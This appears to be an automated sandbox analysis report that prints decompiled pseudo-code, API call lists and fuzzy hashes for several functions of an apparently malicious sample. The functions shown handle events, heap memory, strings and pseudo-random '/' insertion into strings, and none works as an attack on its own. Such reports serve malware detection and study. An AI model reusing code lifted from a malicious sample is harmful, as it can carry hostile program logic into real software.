WaitForSingleObject.KERNEL32(00000000,00004E20,00BBA849,00000000,00000000,?,00000000,?,00BBA849,?,00000001,?,?,?,?,00BB787A), ref: 00BB93A7
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00BBA849,?,00000001,?), ref: 00BB93D5
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00BBA849,?,00000001,?,?,?,?,00BB787A), ref: 00BB93ED

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: bd125c1a39ff6bfcd6e615cbb4819bcb18ec6cb69518a87ecd66459d92518bdf
Instruction ID: 066ec98e95794a71e612ab578d993fbeb7fbf96b197e5b9ffc77327bf940cf64
Opcode Fuzzy Hash: bd125c1a39ff6bfcd6e615cbb4819bcb18ec6cb69518a87ecd66459d92518bdf
Instruction Fuzzy Hash: 5921F6325017119BC7316B689C85AFF77E9EF88B10B4507A5FB55E7290DBE4CC018758

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9208, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00BB9208(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0xbbd140; // 0xbbad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E00BB98E4(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E00BB5DE8(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E00BB1BC5( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x00bb9208
0x00bb9208
0x00bb9212
0x00bb9218
0x00bb921b
0x00bb921f
0x00bb9225
0x00bb922a
0x00bb9243
0x00bb9246
0x00bb924a
0x00bb924e
0x00bb924f
0x00bb9254
0x00bb9257
0x00bb925e
0x00bb9265
0x00bb92b8
0x00bb92be
0x00bb92c4
0x00bb92ff
0x00bb9305
0x00000000
0x00000000
0x00000000
0x00bb92c4
0x00bb926b
0x00000000
0x00bb9272
0x00bb9280
0x00bb9283
0x00bb9286
0x00bb9292
0x00bb9296
0x00bb92f8
0x00bb9298
0x00bb929b
0x00bb929f
0x00bb92a0
0x00bb92a1
0x00bb92a3
0x00bb92aa
0x00bb92e8
0x00bb92f3
0x00bb92ac
0x00bb92af
0x00bb92b3
0x00bb92b3
0x00bb92aa
0x00000000
0x00bb9296
0x00bb926b
0x00bb922f
0x00bb9235
0x00bb9238
0x00bb923d
0x00000000
0x00000000
0x00000000
0x00bb92cd
0x00bb92d5
0x00bb92da
0x00bb92dd
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 00BB921F
SetEvent.KERNEL32(?), ref: 00BB922F
GetLastError.KERNEL32 ref: 00BB92B8

Part of subcall function 00BB1BC5: WaitForMultipleObjects.KERNEL32(00000002,00BBAA33,00000000,00BBAA33,?,?,?,00BBAA33,0000EA60), ref: 00BB1BE0

Part of subcall function 00BB5DE8: HeapFree.KERNEL32(00000000,00000000,00BB682B,00000000,?,?,00000000), ref: 00BB5DF4

GetLastError.KERNEL32(00000000), ref: 00BB92ED

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 2028e52453af74c8d26491f1ae33b0ce92d6b393fd744cc84b6c42a6d4a0c080
Instruction ID: aee6895c123483b9aff31824fd232b908e70377d7b575428047502479d7c30bd
Opcode Fuzzy Hash: 2028e52453af74c8d26491f1ae33b0ce92d6b393fd744cc84b6c42a6d4a0c080
Instruction Fuzzy Hash: 1531F0B5D00709FFDB20EFA5C8C49EEBBF8EB18304F1049A9E602A2151D6B09A459F50

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA79A, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00BBA79A(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00BB7D9E(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E00BB9882(_t23);
						}
					}
					return _t38;
				}
				if(E00BB4EC8(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xbbd2a8, 1, 0,  *0xbbd344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00BB230E(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00BB94E5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00BB9D8B(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00BB9306( &_v32, _t39);
					goto L13;
				}
			}

0x00bba79a
0x00bba7a7
0x00bba7ad
0x00bba7ae
0x00bba7af
0x00bba7b0
0x00bba7b1
0x00bba7b5
0x00bba7c1
0x00bba7c5
0x00bba84d
0x00bba84d
0x00bba850
0x00bba852
0x00bba85a
0x00bba85a
0x00bba860
0x00bba863
0x00bba863
0x00bba860
0x00bba86e
0x00bba86e
0x00bba7d8
0x00bba7da
0x00bba7da
0x00bba7f1
0x00bba7f5
0x00bba7f8
0x00bba803
0x00bba80a
0x00bba80a
0x00bba813
0x00bba817
0x00bba825
0x00bba819
0x00bba819
0x00bba81a
0x00bba81b
0x00bba81c
0x00bba81d
0x00bba81e
0x00bba81e
0x00bba82a
0x00bba82d
0x00bba831
0x00bba833
0x00bba833
0x00bba83a
0x00000000
0x00bba83c
0x00bba83c
0x00bba849
0x00000000
0x00bba849

APIs

CreateEventA.KERNEL32(00BBD2A8,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,00BB787A,?,00000001,?), ref: 00BBA7EB
SetEvent.KERNEL32(00000000,?,?,?,00BB787A,?,00000001,?,00000002,?,?,00BB19AA,?), ref: 00BBA7F8
Sleep.KERNEL32(00000BB8,?,?,?,00BB787A,?,00000001,?,00000002,?,?,00BB19AA,?), ref: 00BBA803
CloseHandle.KERNEL32(00000000,?,?,?,00BB787A,?,00000001,?,00000002,?,?,00BB19AA,?), ref: 00BBA80A

Part of subcall function 00BB230E: WaitForSingleObject.KERNEL32(00000000,?,?,?,00BBA82A,?,00BBA82A,?,?,?,?,?,00BBA82A,?), ref: 00BB23E8

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 3868dcdd591920e8c4d8e620c9263e579403682dd4bbe1be815ff94a1fbff5a1
Instruction ID: fcd53d6de3d973e02bac3d9a1eb18752f5b836095554e05444082a78c1464bf9
Opcode Fuzzy Hash: 3868dcdd591920e8c4d8e620c9263e579403682dd4bbe1be815ff94a1fbff5a1
Instruction Fuzzy Hash: 65218072D00219AFDB20BFE98C858FEB7F9EB44350B0145A5FA11A7100EBF499468BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1000, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00BB1000(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00BB98E4(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x00bb100c
0x00bb1010
0x00bb1011
0x00bb1012
0x00bb1014
0x00bb1016
0x00bb1019
0x00bb101e
0x00bb10b5
0x00bb10bc
0x00bb10bc
0x00bb1027
0x00bb102e
0x00bb103e
0x00bb103e
0x00bb1044
0x00bb1046
0x00bb104b
0x00bb1054
0x00bb105a
0x00bb105f
0x00bb106a
0x00bb106e
0x00bb1070
0x00bb1071
0x00bb107a
0x00bb107e
0x00bb108f
0x00bb1080
0x00bb1085
0x00bb108a
0x00bb1099
0x00bb1099
0x00bb106e
0x00bb109f
0x00bb10a5
0x00bb10a5
0x00bb10ae
0x00bb10b3
0x00bb10b3
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 00BB102E
lstrlenW.KERNEL32(?), ref: 00BB1064
memcpy.NTDLL(00000000,?,?,?), ref: 00BB1085
SysFreeString.OLEAUT32(?), ref: 00BB1099

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 05218bf03b8db3814fcc3d673f03ab5d1ee4f69cd600d2f9ed0419b455429754
Instruction ID: 3d08ff50df63b46e52139ba5b112783d9aa955049f0c234f3e1e665ffb1bab6d
Opcode Fuzzy Hash: 05218bf03b8db3814fcc3d673f03ab5d1ee4f69cd600d2f9ed0419b455429754
Instruction Fuzzy Hash: C9215075900249EFCB11EFA8C9949EEBBF9FF49341B5045A9E905E7210EBB1DA40CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8D06, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00BB8D06(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xbbd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xbbd250; // 0xc4b2110
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xbbd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00bb8d0e
0x00bb8d11
0x00bb8d17
0x00bb8d2f
0x00bb8d31
0x00bb8d36
0x00bb8d38
0x00bb8d3b
0x00bb8d3d
0x00bb8d40
0x00bb8d42
0x00bb8d42
0x00bb8d44
0x00bb8d4f
0x00bb8d54
0x00bb8d65
0x00bb8d6d
0x00bb8d72
0x00bb8d75
0x00bb8d78
0x00bb8d7a
0x00bb8d7d
0x00bb8d80
0x00bb8d80
0x00bb8d83
0x00bb8d8e
0x00bb8d93
0x00bb8d9d

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00BB624C,00000000,?,?,00BB6028,?,036195B0), ref: 00BB8D11
RtlAllocateHeap.NTDLL(00000000,?), ref: 00BB8D29
memcpy.NTDLL(00000000,?,-00000008,?,?,?,00BB624C,00000000,?,?,00BB6028,?,036195B0), ref: 00BB8D6D
memcpy.NTDLL(00000001,?,00000001), ref: 00BB8D8E

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 8bcef06dca848c5c8248c625b78709060a4cefa36c6a8002325f9b24eacf1e33
Instruction ID: becb77a7759725f27a1558ad819070aee35d8c88f8c3870f6b8b98813673c1c3
Opcode Fuzzy Hash: 8bcef06dca848c5c8248c625b78709060a4cefa36c6a8002325f9b24eacf1e33
Instruction Fuzzy Hash: B911C672A00154AFD714DB69DC84DAEBFEEDBD4360B0502BAF60497190EBB49E04C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E10F67D, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6E10F6A1

Part of subcall function 6E10FDC1: __fltout2.LIBCMT ref: 6E10FDEA

__cftog_l.LIBCMT ref: 6E10F6C7
__cftoe_l.LIBCMT ref: 6E10F6F9

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: efc60baeabaff140f2c2f86ee6539793c89da04fc8b4b1a2a4113c13af2a4bd4
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: 1D01243244014EBB8F429EC4CC129EA3F66BB2D254B658815FA3858130DB36C9B1BB89

Uniqueness

Uniqueness Score: -1.00%

Function 6E10E274, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6E10E28B

Part of subcall function 6E10E980: ___BuildCatchObjectHelper.LIBCMT ref: 6E10E9B2
Part of subcall function 6E10E980: ___AdjustPointer.LIBCMT ref: 6E10E9C9

_UnwindNestedFrames.LIBCMT ref: 6E10E2A2
___FrameUnwindToState.LIBCMT ref: 6E10E2B4
CallCatchBlock.LIBCMT ref: 6E10E2D8

Memory Dump Source

Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
Instruction ID: b62e7bbcfcf331b7da79ade0389380820f1547ad09d8249ecc25ed2c62799e5a
Opcode Fuzzy Hash: 5d1cd5e106f7e7765f246397fef7058a53d91a4c863335afadbdca4e939f9908
Instruction Fuzzy Hash: 04010C32100109FBDF029F96CC01EDA7FBAFF58758F158415F91865120DB72EAA1EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB7FCE, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00BB7FCE(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00BB7D4B(_t8, _t1);
				_t16 = E00BB98E4(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00BB1365(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00BB98E4(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00BB5DE8(_t16);
				}
				return _t18;
			}

0x00bb7fd9
0x00bb7fda
0x00bb7fdd
0x00bb7fdf
0x00bb7fea
0x00bb7fee
0x00bb7ff3
0x00bb7ff7
0x00bb7fff
0x00bb8004
0x00bb800c
0x00bb800c
0x00bb8015
0x00bb8019
0x00bb801f
0x00bb8022
0x00bb8028
0x00bb8028
0x00bb8030
0x00bb8030
0x00bb8037
0x00bb8037
0x00bb8042

APIs

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

Part of subcall function 00BB1365: wsprintfA.USER32 ref: 00BB13C1

lstrlen.KERNEL32(00BB197C,00000000,00000000,00000027,00000005,00000000,00000000,00BB8899,74666F53,00000000,00BB197C,00BBD00C,?,00BB197C), ref: 00BB8004
lstrcpy.KERNEL32(00000000,00000000), ref: 00BB8028
lstrcat.KERNEL32(00000000,00000000), ref: 00BB8030

Strings

Soft, xrefs: 00BB7FDA, 00BB7FF3

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 6a442f3f39437f89ad56fb3ff045c3fcabfe903d2c4df7955518009d1f2af487
Instruction ID: 252553592dde9ba64726e6eace8bdfaa145031032f85d2ed9442d3f94166b4f7
Opcode Fuzzy Hash: 6a442f3f39437f89ad56fb3ff045c3fcabfe903d2c4df7955518009d1f2af487
Instruction Fuzzy Hash: 8A018F32100509A7CB227BA89C88AFF3AECEF893C5F444165F6045A102DFF48945D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB891E, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB891E(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x00bb8928
0x00bb892c
0x00bb8941
0x00bb8943
0x00bb8948
0x00bb894e
0x00bb8950
0x00bb8955
0x00bb8960
0x00bb8957
0x00bb8957
0x00bb8957
0x00bb8955
0x00bb896e

APIs

memset.NTDLL ref: 00BB892C
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74B481D0), ref: 00BB8941
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00BB894E
CloseHandle.KERNEL32(?), ref: 00BB8960

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: 5051f5c87e03e943507ca4aec70278fb29a7b2bf1f044b0b5f437c7da0fdf31a
Instruction ID: b72ebc8e7549231b3535aa0f146b570f933a9c6388dd69aa7202005e6a7baea7
Opcode Fuzzy Hash: 5051f5c87e03e943507ca4aec70278fb29a7b2bf1f044b0b5f437c7da0fdf31a
Instruction Fuzzy Hash: 39F054B1504308BFD7206F25DCC4C77BBECEB42298B114A6DF18692511CAB1E8058A71

Uniqueness

Uniqueness Score: -1.00%

Function 00BB149B, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB149B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xbbd26c; // 0x1ec
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xbbd2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xbbd26c; // 0x1ec
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xbbd238; // 0x3220000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00bb149b
0x00bb14a2
0x00bb14ec
0x00bb14ee
0x00bb14ee
0x00bb14a6
0x00bb14ac
0x00bb14b1
0x00bb14b5
0x00bb14bb
0x00bb14c2
0x00000000
0x00000000
0x00bb14c4
0x00bb14c9
0x00000000
0x00000000
0x00000000
0x00bb14c9
0x00bb14cb
0x00bb14d3
0x00bb14d6
0x00bb14d6
0x00bb14dc
0x00bb14e3
0x00bb14e6
0x00bb14e6
0x00000000

APIs

SetEvent.KERNEL32(000001EC,00000001,00BB5C35), ref: 00BB14A6
SleepEx.KERNEL32(00000064,00000001), ref: 00BB14B5
CloseHandle.KERNEL32(000001EC), ref: 00BB14D6
HeapDestroy.KERNEL32(03220000), ref: 00BB14E6

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: baeb8f02dc43d0804d52ac27f5e70ee8319efbe6bd01e8bb5ce51dd7081518a3
Instruction ID: 2aafeb5b7f5a2cdba0919de7e1aee0c6aa53e6d5bd9074b56cc52f464bc59d0b
Opcode Fuzzy Hash: baeb8f02dc43d0804d52ac27f5e70ee8319efbe6bd01e8bb5ce51dd7081518a3
Instruction Fuzzy Hash: 46F01C75A05311DBDB20BB79ED58AA73FE8EB047617844754B804D73A1DFE4C8409A60

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1D3E, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00BB1D3E(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xbbd32c; // 0x36195b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xbbd32c; // 0x36195b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xbbd030) {
					HeapFree( *0xbbd238, 0, _t8);
				}
				_t14[1] = E00BB769A(_v0, _t14);
				_t11 =  *0xbbd32c; // 0x36195b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00bb1d3e
0x00bb1d3e
0x00bb1d47
0x00bb1d57
0x00bb1d57
0x00bb1d5c
0x00bb1d61
0x00000000
0x00000000
0x00bb1d51
0x00bb1d51
0x00bb1d63
0x00bb1d67
0x00bb1d79
0x00bb1d79
0x00bb1d89
0x00bb1d8c
0x00bb1d91
0x00bb1d95
0x00bb1d9b

APIs

RtlEnterCriticalSection.NTDLL(03619570), ref: 00BB1D47
Sleep.KERNEL32(0000000A,?,00BB1971), ref: 00BB1D51
HeapFree.KERNEL32(00000000,00000000,?,00BB1971), ref: 00BB1D79
RtlLeaveCriticalSection.NTDLL(03619570), ref: 00BB1D95

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: a5be8ad558927438ef229ce3e96d8db147ad08660c14f256f7c89e5afd5de37d
Instruction ID: 47f95e25060ddcc9aabafbdd1665ea004934162860b1726928c452c489b8f76f
Opcode Fuzzy Hash: a5be8ad558927438ef229ce3e96d8db147ad08660c14f256f7c89e5afd5de37d
